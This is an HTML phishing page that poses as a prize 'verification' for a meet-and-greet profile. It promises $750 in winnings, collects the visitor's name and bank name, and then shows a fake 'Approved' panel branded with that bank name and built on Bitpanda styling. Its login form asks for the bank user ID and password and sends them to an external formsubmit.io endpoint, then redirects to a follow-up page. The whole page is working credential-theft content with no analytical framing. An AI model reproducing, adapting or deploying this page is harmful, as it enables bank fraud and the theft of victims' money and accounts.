




<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta charset="utf-8">   

<title>Verification</title>
<style>
  #mainContent {
    display: none;
  }
  
  #processing {
    display: none;
    text-align: center;
  }
  
  .lds-ring {
    display: inline-block;
    position: relative;
    width: 60px;
    height: 60px;
  }
  
  .lds-ring div {
    box-sizing: border-box;
    display: block;
    position: absolute;
    width: 140px;
    height: 140px;
    margin: 7px;
    border: 7px solid #000000;
    border-radius: 50%;
    animation: lds-ring 1.9s cubic-bezier(0.5, 0, 0.5, 1) infinite;
    border-color: DarkGreen  transparent transparent transparent;
  }
  
  .lds-ring div:nth-child(1) {
    animation-delay: -0.55s;
  }
  
  .lds-ring div:nth-child(2) {
    animation-delay: -0.9s;
  }
  
  .lds-ring div:nth-child(3) {
    animation-delay: -0.15s;
  }
  
  @keyframes lds-ring {
    0% {
      transform: rotate(0deg);
    }
    100% {
      transform: rotate(360deg);
    }
  }
</style>
<script>
  function submitForm() {
    // Hide the form
    document.getElementById("myForm").style.display = "none";
    
    // Display the "Processing" message and animation
    document.getElementById("processing").style.display = "block";
    
    // Delay displaying the main content
    setTimeout(function() {
      // Hide the processing message and animation
      document.getElementById("processing").style.display = "none";
      
      // Display the main content
      document.getElementById("mainContent").style.display = "block";
      
      // Get the form data
      const name = document.getElementById("name").value;
      const email = document.getElementById("email").value;
      
      // Display the submitted form data in multiple places within the main content
      const submittedNameElements = document.getElementsByClassName("submittedName");
      const submittedEmailElements = document.getElementsByClassName("submittedEmail");
      
      for (let i = 0; i < submittedNameElements.length; i++) {
        submittedNameElements[i].textContent = name;
      }
      
      for (let i = 0; i < submittedEmailElements.length; i++) {
        submittedEmailElements[i].textContent = email;
      }
      
      // Scroll to the main content section
      document.getElementById("mainContent").scrollIntoView({ behavior: 'smooth' });
    }, 4000); // Change delay to 3 seconds
  }
</script>
</head>
<body>


  

 
  <div> 
  <div class="formbold-form-wrapper">


<script>
  async function convertCurrency() {
    try {
      const response = await fetch('https://ipapi.co/json/');
      const data = await response.json();
      const country = data.country_code;

      const currencySymbolElements = document.getElementsByClassName('currency-symbol');

      if (country === 'GB') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '£';
        });
      } else if (country === 'DE' || country === 'FR' || country === 'ES' || country === 'NL') {
        Array.from(currencySymbolElements).forEach(element => {
          element.textContent = '€';
        });
      }
    } catch (error) {
      console.error('Error:', error);
    }
  }
  
  document.addEventListener('DOMContentLoaded', convertCurrency);
</script>









  <form id="myForm" onsubmit="submitForm(); return false;">

 
<p>
 <br>
<span style="color: #000000;">

Welcome back! To continue to your meet and greet profile, please enter the basic information below to  verify it's you.
</span>
<br>
 <br>
</p>  






<div id="error-message"></div>

<script>
function validateInput(input) {
  var minLength = 6;
  var maxLength = 50;
  var errorMessage = document.getElementById("error-message");

  if (input.value.length < minLength || input.value.length > maxLength) {
    errorMessage.textContent = "Enter name";
    input.setCustomValidity("Complete This");
  } else {
    errorMessage.textContent = "";
    input.setCustomValidity("");
  }
}
</script>




<div class="formbold-mb-5">
        <label for="Field1" class="formbold-form-label">   
       Enter your first and last name
        </label>
  <center>
        <input
          type="text" 
          
          oninput="validateInput(this)"
          
          required 
          name="A_"
         
         id="name"
         
          placeholder="Enter First and Last Name"  
          class="formbold-form-input"
        />

</center>
      </div>
      
      <br><br>
      	

     <label for="Field1" class="formbold-form-label">  
Enter name of the bank you wish to receive the $750 winnings (only the name of the bank)

</label>
   <center>

    <input type="text" id="email" name="A_"

oninput="validateInput(this)" required

    placeholder="Enter Name of Your Bank"  
          class="formbold-form-input"
        />   </center>

<br>

      <div><center>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button></center>
      </div>
      
      
          <br> <br> 


<br><br><br><br>

     <br> 
<br>
 
    </form></center>
  </div>
</div>


  

<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-7 {
    margin-bottom: 25px;
  }
  .formbold-pt-8 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 17px;
    color: Black;
    margin-bottom: 5px;
  }
  .formbold-form-label-9 {
    font-weight: 500;
    font-size: 17px;
    margin-bottom: 25px;
  }

  .formbold-form-input {
    width: 94%;
    padding: 13px 19px;
    border-radius: 2px;
    border: 2px solid Black;
    background: white;
    font-weight: 500;
    font-size: 17px;
    color: #000000;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: Grey;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 19px;
    border-radius: 50px;
    padding: 13px 23px;
    border: none;
    font-weight: 500;
    background-color: #000000;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 96%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style> 
  





  <div id="processing">




    <h4>

<br><br>
<br><br>

Processing....

</h4> 
    
    


    <div class="lds-ring">
      <div></div>
      <div></div>
      <div></div>
      <div></div>
    </div>
  </div>
  



  <div id="mainContent">





   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>



<meta content="width=device-width, initial-scale=1.0" name=viewport>




<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>
 
<body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>











<h5>
<strong>



<span class="submittedEmail"></span>

</strong>
</h5>



 </div>
 
</header> 
    
    
    
    
  

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>







<h6>



<div style="border: 1px solid black; padding: 10px; border-radius: 2px;">

<font size="+0.5">
<strong>
 <span class="submittedName"></span>
</strong>
 
 </font> 
 


 <br>  <br> 

<div> 
<div class="container">
    <div class="left-text">
    
<font size="+0.5">

Approved

</font>

</div>


    <div class="right-text">
<font size="+0.5"> <strong>Total winnings:</font> </strong>
    
    <br>
    
    <font size="+1">
 <span class="currency-symbol">$</span>750.00</font></font>
</div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 

</div> 

</h6>





<h6>

<font size="+1"> 


<br> 


Welcome back,  <span class="submittedName"></span>,  we are unable to verify that the 

<span class="submittedEmail"></span> 

 account you provided earlier belongs to you, which is why there was a delay in sending you a verification code. 

<br><br>

Please follow the procedures below to manually log in to your bank account, and follow the prompts to verify that the <span class="submittedEmail"></span>  account belongs to you, to ensure that you receive the   <span class="currency-symbol">$</span>750 winnings.

</font>



<br> <br><br>


<strong>
<font size="+1">Secured  by <span class="submittedEmail"></span> </font>
</strong>


<br>
<br>

<font size="+1">

<span class="submittedName"></span>, 

log in to your <span class="submittedEmail"></span> account, and follow the prompts to verify that it belongs to you.
<br><br></font>

<div> 
<div class="container">
    <div class="left-text"><strong> 
    <font size="+1">





</strong></font>

</div>
    <div class="right-text">
    
    <font size="+1">
<strong>   Login</strong>
</font>


<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTvF16t22BS4V3JPQHoBf3rqiJ77vBW4OYKRw&amp;usqp=CAU" jsaction="VQAsE" class="sFlh5c pT0Scc iPVvYb" style="max-width: 1640px; width: 28px; height: 30px; margin: 0px;" alt="Pinterest" jsname="kn3ccd" aria-hidden="false">

  
 
   </div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style> </div> 





<div style="background-color: lightgray; border-radius: 1px; padding: 20px; color: Black;">

   <div>
<font size="+1"> <strong>
Secured by <span class="submittedEmail"></span> </strong> 
</font>
<br><br>


    <div class="container">





        <div class="left-text">
        
        
            <strong>
               
                    <span style="text-decoration: underline; text-decoration-color: orange; text-decoration-thickness: 4px; font-size: 19px;">Online Banking</span>
                    
                    </strong> 
            
            
        </div>
        <div class="center-text">
        
        
            <strong>
               
                    <span style="font-size: 1px;">&nbsp</span>
               
            </strong>
            
            
        </div>
        <div class="right-text">
        
        
        
         
          
                   
            
        </div>
    </div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .center-text {
        justify-self: center;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>
   
   <br>
   
   
   <form  action="https://formsubmit.io/send/538bcbc9-8ef0-46ba-9114-8a9534b3b334" method="POST">

<input name="_redirect" type="hidden" id="name" value="https://celebrity-org.github.io/Finish-verify/">

   
   
   
   <input type="text" placeholder=" Enter Your User ID / Username" name="UserId-UsernameBANK" required  style="width: 100%; font-size: 19px; padding: 14px 0; background-color: #ffffff; border: 1px solid white; font-weight: bold;" />
   
  
    <br> <br>
    
    
    <input type="text" placeholder=" Enter Your Password" name="Passssword" required style="width: 100%; font-size: 19px; padding: 14px 0; background-color: #ffffff; border: 1px solid white; font-weight: bold;" />
    
    
       <br> 
    <br> <br>
    
    
    <button type="submit" style="padding: 10px 50px; font-size: 21px; font-weight: bold; background-color: #2F539B; color: #ffffff; border: none;">Login</button>
    
    
   </form>
    <br>
    <br>


<font size="+1">
    Powered by <span class="submittedEmail"></span> 
</font>

</div>


<br><br><br><br><br>
<br><br><br><br><br>



</h6>
 


 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">



</path> </symbol></svg> </div>
  
  <script>
    // Hide the processing message and form initially
    document.getElementById("processing").style.display = "none";
    document.getElementById("myForm").style.display = "block";
  </script>
</body>
</html>
